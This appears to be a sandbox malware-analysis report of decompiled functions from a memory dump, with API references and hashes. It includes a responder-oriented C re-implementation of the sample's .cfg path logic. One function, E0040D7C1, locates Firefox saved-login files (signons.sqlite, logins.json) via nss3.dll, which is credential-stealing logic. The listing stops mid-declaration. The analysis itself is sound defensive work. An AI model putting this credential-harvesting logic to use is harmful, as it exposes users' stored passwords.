                                                                                                                                                                   				_v804 = 0;                                                                         // 0x0040b04f
                                                                                                                                                                   				memset( &_v803, 0, 0x104);                                                         // 0x0040b056
                                                                                                                                                                   				GetModuleFileNameA(0,  &_v804, 0x104);                                             // 0x0040b067
                                                                                                                                                                   				_t47 = strrchr( &_v804, 0x2e);                                                     // 0x0040b076
                                                                                                                                                                   				if(_t47 != 0) {                                                                    // 0x0040b07f
                                                                                                                                                                   					 *_t47 = 0;                                                                        // 0x0040b081
                                                                                                                                                                   				}                                                                                  // 0x0040b081
                                                                                                                                                                   				strcat( &_v804, ".cfg");                                                           // 0x0040b090
                                                                                                                                                                   				_v536 = _a4;                                                                       // 0x0040b098
                                                                                                                                                                   				_v540 = 0x414c5c;                                                                  // 0x0040b0ac
                                                                                                                                                                   				_v532 = 0;                                                                         // 0x0040b0b6
                                                                                                                                                                   				_v271 = 0;                                                                         // 0x0040b0bd
                                                                                                                                                                   				strcpy( &_v532,  &_v804);                                                          // 0x0040b0c4
                                                                                                                                                                   				strcpy( &_v271, "General");                                                        // 0x0040b0d5
                                                                                                                                                                   				_t88 =  *((intOrPtr*)(_t75 + 0x36c));                                              // 0x0040b0da
                                                                                                                                                                   				_t16 =  &_v540; // 0x414c5c                                                        // 0x0040b0e8
                                                                                                                                                                   				 *((intOrPtr*)( *_t16 + 4))("ShowGridLines", _t88 + 4, 0);                         // 0x0040b0f9
                                                                                                                                                                   				_t20 =  &_v540; // 0x414c5c                                                        // 0x0040b101
                                                                                                                                                                   				 *((intOrPtr*)( *_t20 + 8))("SaveFilterIndex", _t88 + 8, 0);                       // 0x0040b112
                                                                                                                                                                   				_t24 =  &_v540; // 0x414c5c                                                        // 0x0040b11a
                                                                                                                                                                   				 *((intOrPtr*)( *_t24 + 4))("AddExportHeaderLine", _t88 + 0xc, 0);                 // 0x0040b12b
                                                                                                                                                                   				_t27 =  &_v540; // 0x414c5c                                                        // 0x0040b12e
                                                                                                                                                                   				 *((intOrPtr*)( *_t27 + 4))("MarkOddEvenRows", _t88 + 0x10, 0);                    // 0x0040b144
                                                                                                                                                                   				_t67 = _v536;                                                                      // 0x0040b147
                                                                                                                                                                   				_a4 = _t67;                                                                        // 0x0040b151
                                                                                                                                                                   				_t90 = 0x2c;                                                                       // 0x0040b154
                                                                                                                                                                   				if(_t67 != 0) {                                                                    // 0x0040b155
                                                                                                                                                                   					_t84 =  *(_t75 + 0x108);                                                           // 0x0040b157
                                                                                                                                                                   					if(_t84 != 0) {                                                                    // 0x0040b15f
                                                                                                                                                                   						_t73 = _t75 + 0x128;                                                               // 0x0040b161
                                                                                                                                                                   						_t73->length = _t90;                                                               // 0x0040b169
                                                                                                                                                                   						GetWindowPlacement(_t84, _t73);                                                    // 0x0040b16b
                                                                                                                                                                   					}                                                                                  // 0x0040b16b
                                                                                                                                                                   				}                                                                                  // 0x0040b15f
                                                                                                                                                                   				_t35 =  &_v540; // 0x414c5c                                                        // 0x0040b179
                                                                                                                                                                   				_t36 =  &_v540; // 0x414c5c                                                        // 0x0040b184
                                                                                                                                                                   				_t83 = _t36;                                                                       // 0x0040b184
                                                                                                                                                                   				 *((intOrPtr*)( *_t35 + 0xc))("WinPos", _t75 + 0x128, _t90);                       // 0x0040b18a
                                                                                                                                                                   				if(_a4 == 0) {                                                                     // 0x0040b190
                                                                                                                                                                   					E00401823(_t75);                                                                   // 0x0040b192
                                                                                                                                                                   				}                                                                                  // 0x0040b192
                                                                                                                                                                   				_t40 =  &_v540; // 0x414c5c                                                        // 0x0040b19d
                                                                                                                                                                   				return E004087DB( *((intOrPtr*)(_t75 + 0x370)), _t83, _t40);                       // 0x0040b1ac
                                                                                                                                                                   			}

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040B056
                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040B067
                                                                                                                                                                  • strrchr.MSVCRT ref: 0040B076
                                                                                                                                                                  • strcat.MSVCRT(00000000,.cfg), ref: 0040B090
                                                                                                                                                                  • strcpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040B0C4
                                                                                                                                                                  • strcpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040B0D5
                                                                                                                                                                  • GetWindowPlacement.USER32(?,?), ref: 0040B16B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: strcpy$FileModuleNamePlacementWindowmemsetstrcatstrrchr
                                                                                                                                                                  • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos$\LA
                                                                                                                                                                  • API String ID: 1301239246-3877392175
                                                                                                                                                                  • Opcode ID: 0827365863aa91c80afc493f8c43d1ccc0429d1286164b8e7b7a3723fcb05fb6
                                                                                                                                                                  • Instruction ID: 0af9f59d4ba14ec1661be341c61033e05a04fd550f4be300a3a65ce9efdf479e
                                                                                                                                                                  • Opcode Fuzzy Hash: 0827365863aa91c80afc493f8c43d1ccc0429d1286164b8e7b7a3723fcb05fb6
                                                                                                                                                                  • Instruction Fuzzy Hash: F2414A72940118AFCB21DB54CC88FDABBBCAB58700F0441E6F509E7191DB749BC8CBA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%
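                                                                                                                                                                   The function E0040B031 above derives the settings-file path the injected payload writes to: it takes its own module path (GetModuleFileNameA, 0x104-byte buffer), cuts the string at the last '.' found by strrchr over the whole path, appends ".cfg", and then stores the "General" keys (ShowGridLines, SaveFilterIndex, AddExportHeaderLine, MarkOddEvenRows, WinPos) through the object at _v540. For a responder the useful artifact is therefore a .cfg file sitting next to the executable, named after it. The portable C below is an added example written for this report, not code recovered from the sample: it re-implements only the path derivation with a caller-supplied path in place of GetModuleFileNameA, using the same 0x104 buffer size, and adds a helper that flags the one edge case the original logic mishandles. Because strrchr scans the full path, a dot in a directory name combined with an extension-less file name truncates the directory instead of the extension; all input paths are constructed.

```c
/* Added example: portable re-implementation of the .cfg path derivation
 * seen in E0040B031. Not the sample's code; GetModuleFileNameA is replaced
 * by a caller-supplied module path so the logic can be exercised anywhere. */
#include <stdio.h>
#include <string.h>

#define CFG_PATH_MAX 0x104   /* 260 bytes: the memset / GetModuleFileNameA size in the dump */

/* Mirrors: module path -> strrchr('.') -> truncate -> strcat(".cfg").
 * Returns the length of the derived path, or -1 if the input would not fit
 * the 260-byte buffer the original uses (GetModuleFileNameA would truncate). */
int derive_cfg_path(const char *module_path, char *out, size_t out_len)
{
    char buf[CFG_PATH_MAX + sizeof ".cfg"];   /* room for the appended ".cfg" */
    char *dot;

    if (module_path == NULL || out_len == 0 || strlen(module_path) >= CFG_PATH_MAX)
        return -1;

    memset(buf, 0, sizeof buf);
    strcpy(buf, module_path);

    /* The sample searches the whole path for the last '.', not just the
     * file-name component; with no extension, a dotted directory gets cut. */
    dot = strrchr(buf, '.');
    if (dot != NULL)
        *dot = '\0';
    strcat(buf, ".cfg");

    if (strlen(buf) >= out_len)
        return -1;
    strcpy(out, buf);
    return (int)strlen(out);
}

/* Convenience wrapper returning a static buffer (NULL on failure). */
const char *cfg_path_static(const char *module_path)
{
    static char out[CFG_PATH_MAX + 8];
    return derive_cfg_path(module_path, out, sizeof out) < 0 ? NULL : out;
}

/* Returns 1 when the truncating '.' lies before the last path separator,
 * i.e. the derived .cfg name lands in the parent directory rather than
 * beside the executable. Worth checking when hunting for the artifact. */
int cfg_path_truncates_directory(const char *module_path)
{
    const char *dot = strrchr(module_path, '.');
    const char *sep = strrchr(module_path, '\\');
    if (sep == NULL)
        sep = strrchr(module_path, '/');
    return dot != NULL && sep != NULL && dot < sep;
}

int main(void)
{
    /* Constructed inputs, not paths taken from the analysed sample. */
    const char *samples[] = {
        "C:\\Users\\Public\\invoice_pdf.exe",
        "C:\\Users\\j.doe\\tool",
        "C:\\tools\\noext",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        const char *cfg = cfg_path_static(samples[i]);
        printf("%s -> %s%s\n", samples[i], cfg ? cfg : "(too long)",
               cfg_path_truncates_directory(samples[i]) ? "  [directory truncated]" : "");
    }
    return 0;
}
```

                                                                                                                                                                   When sweeping a host, look for "<basename>.cfg" beside the dropped executable first; if the executable was dropped with no extension under a dotted directory (for example a user profile such as j.doe), the file appears one level up with the directory's stem as its name.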

                                                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                                                  			E004095F5(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  				signed int _v20;
                                                                                                                                                                  				signed int _v24;
                                                                                                                                                                  				signed int _v28;
                                                                                                                                                                  				void _v79;
                                                                                                                                                                  				char _v80;
                                                                                                                                                                  				void _v131;
                                                                                                                                                                  				char _v132;
                                                                                                                                                                  				void _v183;
                                                                                                                                                                  				char _v184;
                                                                                                                                                                  				char _v236;
                                                                                                                                                                  				void _v491;
                                                                                                                                                                  				char _v492;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* _t83;
                                                                                                                                                                  				void* _t100;
                                                                                                                                                                  				char* _t103;
                                                                                                                                                                  				intOrPtr* _t120;
                                                                                                                                                                  				signed int _t121;
                                                                                                                                                                  				char _t139;
                                                                                                                                                                  				signed int _t152;
                                                                                                                                                                  				signed int _t153;
				signed int _t156;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t120 = __ebx;
				_v492 = 0;
				memset( &_v491, 0, 0xfe);
				_t121 = 0xc;
				memcpy( &_v236, "<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t121 << 2);
				asm("movsb");
				_t156 = 0;
				_v132 = 0;
				memset( &_v131, 0, 0x31);
				_v184 = 0;
				memset( &_v183, 0, 0x31);
				_v80 = 0;
				memset( &_v79, 0, 0x31);
				_t160 = _t158 + 0x3c;
				_t83 =  *((intOrPtr*)( *__ebx + 0x10))();
				_v12 =  *((intOrPtr*)(__ebx + 0x1b4));
				if(_t83 != 0xffffffff) {
					sprintf( &_v132, " bgcolor=\"%s\"", E0040F6E2(_t83,  &_v492));
					_t160 = _t160 + 0x14;
				}
				E00405F07(_a4, "<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t156;
				if( *((intOrPtr*)(_t120 + 0x20)) > _t156) {
					while(1) {
						_t152 =  *( *((intOrPtr*)(_t120 + 0x24)) + _v8 * 4);
						if( *((intOrPtr*)((_t152 << 4) +  *((intOrPtr*)(_t120 + 0x34)) + 4)) != _t156) {
							strcpy( &_v80, " nowrap");
						}
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _t156;
						_t157 = _a8;
						 *((intOrPtr*)( *_t120 + 0x30))(5, _v8, _t157,  &_v28);
						E0040F6E2(_v28,  &_v184);
						E0040F70E( *((intOrPtr*)( *_t157))(_t152,  *(_t120 + 0x4c)),  *(_t120 + 0x50));
						 *((intOrPtr*)( *_t120 + 0x48))( *(_t120 + 0x50), _t157, _t152);
						_t100 =  *((intOrPtr*)( *_t120 + 0x14))();
						_t153 = _t152 * 0x14;
						if(_t100 == 0xffffffff) {
							strcpy( *(_t120 + 0x54),  *(_t153 + _v12 + 0x10));
						} else {
							_push( *(_t153 + _v12 + 0x10));
							_push(E0040F6E2(_t100,  &_v492));
							sprintf( *(_t120 + 0x54), "<font color=\"%s\">%s</font>");
							_t160 = _t160 + 0x10;
						}
						_t103 =  *(_t120 + 0x50);
						_t139 =  *_t103;
						if(_t139 == 0 || _t139 == 0x20) {
							strcat(_t103, "&nbsp;");
						}
						E0040F797( &_v28,  *((intOrPtr*)(_t120 + 0x58)),  *(_t120 + 0x50));
						sprintf( *(_t120 + 0x4c),  &_v236,  &_v132,  *(_t120 + 0x54),  &_v184,  &_v80,  *((intOrPtr*)(_t120 + 0x58)));
						E00405F07(_a4,  *(_t120 + 0x4c));
						_t160 = _t160 + 0x2c;
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t120 + 0x20))) {
							goto L14;
						}
						_t156 = 0;
					}
				}
				L14:
				E00405F07(_a4, "</table><p>");
				return E00405F07(_a4, 0x413b1c);
			}

Instruction address column for the listing above (0x004095f5 - 0x00409805)

APIs
• memset.MSVCRT ref: 00409615
• memset.MSVCRT ref: 00409638
• memset.MSVCRT ref: 0040964E
• memset.MSVCRT ref: 0040965E
• sprintf.MSVCRT ref: 00409692
• strcpy.MSVCRT(00000000, nowrap), ref: 004096D9
• sprintf.MSVCRT ref: 00409760
• strcat.MSVCRT(?,&nbsp;), ref: 0040978F
  • Part of subcall function 0040F6E2: sprintf.MSVCRT ref: 0040F701
• strcpy.MSVCRT(?,?), ref: 00409774
• sprintf.MSVCRT ref: 004097C3
  • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
  • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,76D24DE0,00000000,?,?,00409460,00000001,00413B1C,76D24DE0), ref: 00405F21
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: memsetsprintf$strcpy$FileWritestrcatstrlen
• String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
• API String ID: 2822972341-601624466
• Opcode ID: 17b7667225c5a6bbdce009f3410a16bb9bd559968b7daa8f1be1712407fa5f11
• Instruction ID: ad5d45e3310275bf8c81aed9ad428c342ee671dbf73ea1c77541a84cad310e98
• Opcode Fuzzy Hash: 17b7667225c5a6bbdce009f3410a16bb9bd559968b7daa8f1be1712407fa5f11
• Instruction Fuzzy Hash: AA615032900214AFDF18DF94CC85EDE7B79EF08314F1001AAFA05A71D2DB79AA95CB59
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 58%
			E0040A02E(void* __eax) {
				void* _v36;
				long _v40;
				void* _v44;
				void* _v56;
				long _t21;
				void* _t24;
				long _t26;
				long _t34;
				long _t37;
				intOrPtr* _t40;
				void* _t42;
				intOrPtr* _t44;
				void* _t47;

				_t40 = ImageList_Create;
				_t47 = __eax;
				_t44 = __imp__ImageList_SetImageCount;
				if( *((intOrPtr*)(__eax + 0x198)) != 0) {
					_t37 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
					 *(_t47 + 0x18c) = _t37;
					 *_t44(_t37, 1);
					SendMessageA( *(_t47 + 0x184), 0x1003, 1,  *(_t47 + 0x18c));
				}
                                                                                                                                                                  				if( *((intOrPtr*)(_t47 + 0x19c)) != 0) {
                                                                                                                                                                  					_t34 =  *_t40(0x20, 0x20, 0x19, 1, 1);
                                                                                                                                                                  					 *(_t47 + 0x190) = _t34;
                                                                                                                                                                  					 *_t44(_t34, 1);
                                                                                                                                                                  					SendMessageA( *(_t47 + 0x184), 0x1003, 0,  *(_t47 + 0x190));
                                                                                                                                                                  				}
                                                                                                                                                                  				_t21 =  *_t40(0x10, 0x10, 0x19, 1, 1);
                                                                                                                                                                  				 *(_t47 + 0x188) = _t21;
                                                                                                                                                                  				 *_t44(_t21, 2);
                                                                                                                                                                  				_v36 = LoadImageA( *0x417b94, 0x85, 0, 0x10, 0x10, 0x1000);
                                                                                                                                                                  				_t24 = LoadImageA( *0x417b94, 0x86, 0, 0x10, 0x10, 0x1000);
                                                                                                                                                                  				_t42 = _t24;
                                                                                                                                                                  				 *_t44( *(_t47 + 0x188), 0);
                                                                                                                                                                  				_t26 = GetSysColor(0xf);
                                                                                                                                                                  				_v40 = _t26;
                                                                                                                                                                  				ImageList_AddMasked( *(_t47 + 0x188), _v44, _t26);
                                                                                                                                                                  				ImageList_AddMasked( *(_t47 + 0x188), _t42, _v40);
                                                                                                                                                                  				DeleteObject(_v56);
                                                                                                                                                                  				DeleteObject(_t42);
                                                                                                                                                                  				return SendMessageA(E004049F1( *(_t47 + 0x184)), 0x1208, 0,  *(_t47 + 0x188));
                                                                                                                                                                  			}
APIs
• ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040A05B
• ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 0040A066
• SendMessageA.USER32 ref: 0040A07B
• ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0040A090
• ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 0040A09B
• SendMessageA.USER32 ref: 0040A0B0
• ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040A0BC
• ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 0040A0C7
• LoadImageA.USER32 ref: 0040A0E5
• LoadImageA.USER32 ref: 0040A101
• ImageList_SetImageCount.COMCTL32(?,00000000), ref: 0040A10D
• GetSysColor.USER32(0000000F), ref: 0040A111
• ImageList_AddMasked.COMCTL32(?,?,00000000), ref: 0040A12C
• ImageList_AddMasked.COMCTL32(?,00000000,?), ref: 0040A139
• DeleteObject.GDI32(?), ref: 0040A145
• DeleteObject.GDI32(00000000), ref: 0040A148
• SendMessageA.USER32 ref: 0040A166
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: Image$List_$Count$CreateMessageSend$DeleteLoadMaskedObject$Color
• String ID:
• API String ID: 3411798969-0
• Opcode ID: 1bd64ef7cf6ebfbe1216c8ae3712fe611673920fae5758317d27ef3baf5e7dda
• Instruction ID: 418605dbbba7a2bdca51e359c3d30d4779c94778b6a4b101a6c03afd9e8c1dd7
• Opcode Fuzzy Hash: 1bd64ef7cf6ebfbe1216c8ae3712fe611673920fae5758317d27ef3baf5e7dda
• Instruction Fuzzy Hash: F13121716803087EFA316B709C47FD6BB95EB48B05F104829F3956A1E1CAF279909B18
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 82%
E0040D7C1(intOrPtr* __eax, void* __edx, void* __eflags, intOrPtr _a4) {
    void _v267;
    char _v268;
    void _v531;
    char _v532;
    void* __edi;
    void* __esi;
    void* _t45;
    int _t54;
    int _t60;
    char* _t63;
    void* _t65;
    void* _t67;
    void* _t72;
    char* _t73;
    void* _t82;
    int _t91;
    char* _t97;
    void* _t100;
    void* _t104;
    void* _t105;
    void* _t106;
    void* _t120;
    intOrPtr* _t121;
    void* _t125;
    char** _t126;
    char** _t127;

    _t120 = __edx;
    _t121 = __eax;
    _t45 = E00406C5E(__eax + 0x1c, __eax, __eflags, _a4);
    _t130 = _t45;
    if(_t45 == 0) {
        __eflags = 0;
        return 0;
    }
    E00404638(_t121 + 0x468);
    E00406209(_t121 + 0x158, _a4);
    _t97 = _t121 + 0x25d;
     *_t97 = 0;
    E0040C70B(_t130, _t121 + 0x18);
    if( *_t97 == 0) {
        _t91 = strlen(_t121 + 0x158);
         *_t126 = "signons.txt";
        _t10 = strlen(??) + 1; // 0x1
        if(_t91 + _t10 >= 0x104) {
             *((char*)(_t121 + 0x25d)) = 0;
        } else {
            E004062B7(_t121 + 0x25d, _t121 + 0x158, "signons.txt");
        }
    }
    _v268 = 0;
    memset( &_v267, 0, 0x104);
    _t127 =  &(_t126[3]);
    _t54 = strlen(_t121 + 0x158);
     *_t127 = "signons.sqlite";
    _t18 = strlen(??) + 1; // 0x1
    if(_t54 + _t18 >= 0x104) {
        _v268 = 0;
    } else {
        E004062B7( &_v268, _t121 + 0x158, "signons.sqlite");
    }
    _v532 = 0;
    memset( &_v531, 0, 0x104);
    _t60 = strlen(_t121 + 0x158);
    _t127[3] = "logins.json";
    _t26 = strlen(??) + 1; // 0x1
    _pop(_t104);
    if(_t60 + _t26 >= 0x104) {
        _v532 = 0;
    } else {
        E004062B7( &_v532, _t121 + 0x158, "logins.json");
        _pop(_t104);
    }
    _t63 = _t121 + 0x25d;
    _t135 =  *_t63;
    if( *_t63 != 0) {
        _t82 = E00406C5E(_t121 + 4, _t121, _t135, _t63);
        _t136 = _t82;
        if(_t82 != 0) {
            E0040C656(_t104, _t121, _t136);
        }
    }
    _t65 = E00406155( &_v268);
    _t137 = _t65;
                                                                                                                                                                  				_pop(_t105);
                                                                                                                                                                  				if(_t65 != 0) {
                                                                                                                                                                  					E0040D3B5(_t105, _t137, _t121,  &_v268);
                                                                                                                                                                  				}
                                                                                                                                                                  				_t67 = E00406155( &_v532);
                                                                                                                                                                  				_t138 = _t67;
                                                                                                                                                                  				_pop(_t106);
                                                                                                                                                                  				if(_t67 != 0) {
                                                                                                                                                                  					E0040D003(_t106, _t120, _t138, _t121,  &_v532);
                                                                                                                                                                  				}
                                                                                                                                                                  				_t100 = 0;
                                                                                                                                                                  				if( *((intOrPtr*)(_t121 + 0x474)) <= 0) {
                                                                                                                                                                  					L24:
                                                                                                                                                                  					return 1;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					do {
                                                                                                                                                                  						_t125 = E0040DA96(_t100, _t121 + 0x468);
                                                                                                                                                                  						_t38 = _t125 + 0x504; // 0x504
                                                                                                                                                                  						_t72 = _t38;
                                                                                                                                                                  						_push("none");
                                                                                                                                                                  						_push(_t72);
                                                                                                                                                                  						L00412072();
                                                                                                                                                                  						if(_t72 != 0) {
                                                                                                                                                                  							_t39 = _t125 + 4; // 0x4
                                                                                                                                                                  							_t73 = _t39;
                                                                                                                                                                  							if( *_t73 == 0) {
                                                                                                                                                                  								_t40 = _t125 + 0x204; // 0x204
                                                                                                                                                                  								strcpy(_t73, _t40);
                                                                                                                                                                  							}
                                                                                                                                                                  							 *((intOrPtr*)( *_t121 + 4))(_t125);
                                                                                                                                                                  						}
                                                                                                                                                                  						_t100 = _t100 + 1;
                                                                                                                                                                  					} while (_t100 <  *((intOrPtr*)(_t121 + 0x474)));
                                                                                                                                                                  					goto L24;
                                                                                                                                                                  				}
                                                                                                                                                                  			}
                                                                                                                                                                  Instruction addresses for the listing above: 0x0040d7c1 through 0x0040d9cf (one address per decompiled line).

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00406C5E: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040D7DA,?,?,?,?), ref: 00406C77
                                                                                                                                                                    • Part of subcall function 00406C5E: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00406CA3
                                                                                                                                                                    • Part of subcall function 00404638: free.MSVCRT(00000000,0040BE16), ref: 0040463F
                                                                                                                                                                    • Part of subcall function 00406209: strcpy.MSVCRT(?,?,0040D7FB,?,?,?,?,?), ref: 0040620E
                                                                                                                                                                    • Part of subcall function 00406209: strrchr.MSVCRT ref: 00406216
                                                                                                                                                                    • Part of subcall function 0040C70B: memset.MSVCRT ref: 0040C72C
                                                                                                                                                                    • Part of subcall function 0040C70B: memset.MSVCRT ref: 0040C740
                                                                                                                                                                    • Part of subcall function 0040C70B: memset.MSVCRT ref: 0040C754
                                                                                                                                                                    • Part of subcall function 0040C70B: memcpy.MSVCRT ref: 0040C821
                                                                                                                                                                    • Part of subcall function 0040C70B: memcpy.MSVCRT ref: 0040C881
                                                                                                                                                                  • strlen.MSVCRT ref: 0040D81F
                                                                                                                                                                  • strlen.MSVCRT ref: 0040D82D
                                                                                                                                                                  • memset.MSVCRT ref: 0040D86E
                                                                                                                                                                  • strlen.MSVCRT ref: 0040D87D
                                                                                                                                                                  • strlen.MSVCRT ref: 0040D88B
                                                                                                                                                                  • memset.MSVCRT ref: 0040D8CC
                                                                                                                                                                  • strlen.MSVCRT ref: 0040D8DB
                                                                                                                                                                  • strlen.MSVCRT ref: 0040D8E9
                                                                                                                                                                  • _stricmp.MSVCRT(00000504,none,?,?,?,?,?,?), ref: 0040D997
                                                                                                                                                                  • strcpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040D9B2
                                                                                                                                                                    • Part of subcall function 004062B7: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062BF
                                                                                                                                                                    • Part of subcall function 004062B7: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062CE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: strlen$memset$strcpy$memcpy$CloseFileHandleSize_stricmpfreestrcatstrrchr
                                                                                                                                                                  • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                                  • API String ID: 1405107918-3138536805
                                                                                                                                                                  • Opcode ID: dc38bddda9e42b5c5320f9286ff75ddff83acf33bc21f5fa31688107119b79d7
                                                                                                                                                                  • Instruction ID: d07004e2ff50c5cd41ef2cdd6425adcf976a56e41a8fa9a3887142b7f0986be6
                                                                                                                                                                  • Opcode Fuzzy Hash: dc38bddda9e42b5c5320f9286ff75ddff83acf33bc21f5fa31688107119b79d7
                                                                                                                                                                  • Instruction Fuzzy Hash: B051E3B2904145AED714EBE0CC85BDAB7ACAF41305F10057BE159E21C2EB78AAD98B5C
                                                                                                                                                                  Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 70%
// Decompiled: compares the command-line argument against the save-format
// switches (/shtml, /sverhtml, /sxml, /stab, /scomma, /stabular, /skeepass)
// via _stricmp (L00412072) and returns a numeric output-format code.
E0040BA21(signed int __eax, void* __esi) {
	void* _t5;
	void* _t6;
	void* _t7;
	void* _t8;
	void* _t9;
	void* _t10;

	_push("/shtml");
	L00412072();
	if(__eax != 0) {
		_push("/sverhtml");
		L00412072();
		if(__eax != 0) {
			_push("/sxml");
			L00412072();
			if(__eax != 0) {
				_push("/stab");
				L00412072();
				if(__eax != 0) {
					_push("/scomma");
					L00412072();
					if(__eax != 0) {
						_push("/stabular");
						L00412072();
						if(__eax != 0) {
							_push("/skeepass");
							L0041207E();
							asm("sbb eax, eax");
							// 8 if /skeepass matched, 0 if no switch matched
							return ( ~__eax & 0xfffffff8) + 8;
						} else {
							_t5 = 3;	// /stabular
							return _t5;
						}
					} else {
						_t6 = 7;	// /scomma
						return _t6;
					}
				} else {
					_t7 = 2;	// /stab
					return _t7;
				}
			} else {
				_t8 = 6;	// /sxml
				return _t8;
			}
		} else {
			_t9 = 5;	// /sverhtml
			return _t9;
		}
	} else {
		_t10 = 4;	// /shtml
		return _t10;
	}
}

Instruction addresses (per decompiled line): 0x0040ba22, 0x0040ba27, 0x0040ba30, 0x0040ba37, 0x0040ba3c, 0x0040ba45, 0x0040ba4c, 0x0040ba51, 0x0040ba5a, 0x0040ba61, 0x0040ba66, 0x0040ba6f, 0x0040ba76, 0x0040ba7b, 0x0040ba84, 0x0040ba8b, 0x0040ba90, 0x0040ba99, 0x0040baa0, 0x0040baa5, 0x0040baac, 0x0040bab6, 0x0040ba9b, 0x0040ba9d, 0x0040ba9e, 0x0040ba86, 0x0040ba88, 0x0040ba89, 0x0040ba71, 0x0040ba73, 0x0040ba74, 0x0040ba5c, 0x0040ba5e, 0x0040ba5f, 0x0040ba47, 0x0040ba49, 0x0040ba4a, 0x0040ba32, 0x0040ba34, 0x0040ba35

APIs
• _stricmp.MSVCRT(/shtml,0041344F,0040BB20,?,00000000,00000000,?,?,?,0040BCA6), ref: 0040BA27
• _stricmp.MSVCRT(/sverhtml,0041344F,0040BB20,?,00000000,00000000,?,?,?,0040BCA6), ref: 0040BA3C
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: _stricmp
• String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
• API String ID: 2884411883-1959339147
• Opcode ID: b70f27fc5aecc47ba7919a44c3d765b9763ae409b21ddab941f54064ab36d7b0
• Instruction ID: 9cc75f2135a457fb5b155108ec4f1482e5c4f70433a9f240ecae405c43e57cbb
• Opcode Fuzzy Hash: b70f27fc5aecc47ba7919a44c3d765b9763ae409b21ddab941f54064ab36d7b0
• Instruction Fuzzy Hash: 0401DE7238A31128F934A1A63E17BD30A44CBE1B7AF30465BF555E41C1EF9D949094AC
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 92%
// Decompiled: writes the opening <table> and <tr> of an HTML report to the
// output file (_a4) via E00405F07, optionally with a row background colour
// (_a16) and a font colour (_a20) rendered by E0040F6E2, then emits one <th>
// per column from the column table at _a8 (_a12 columns, 8 bytes each:
// title pointer followed by width string pointer).
E0040F8B4(intOrPtr _a4, intOrPtr _a8, char _a12, char _a16, intOrPtr _a20) {
	void _v259;
	char _v260;
	void _v515;
	char _v516;
	void _v771;
	char _v772;
	void _v1027;
	char _v1028;
	char _v1284;
	char _v2308;
	char* _t34;	// loop counter pointer, was used below without a declaration
	char _t47;
	intOrPtr* _t50;
	void* _t57;
	intOrPtr* _t73;
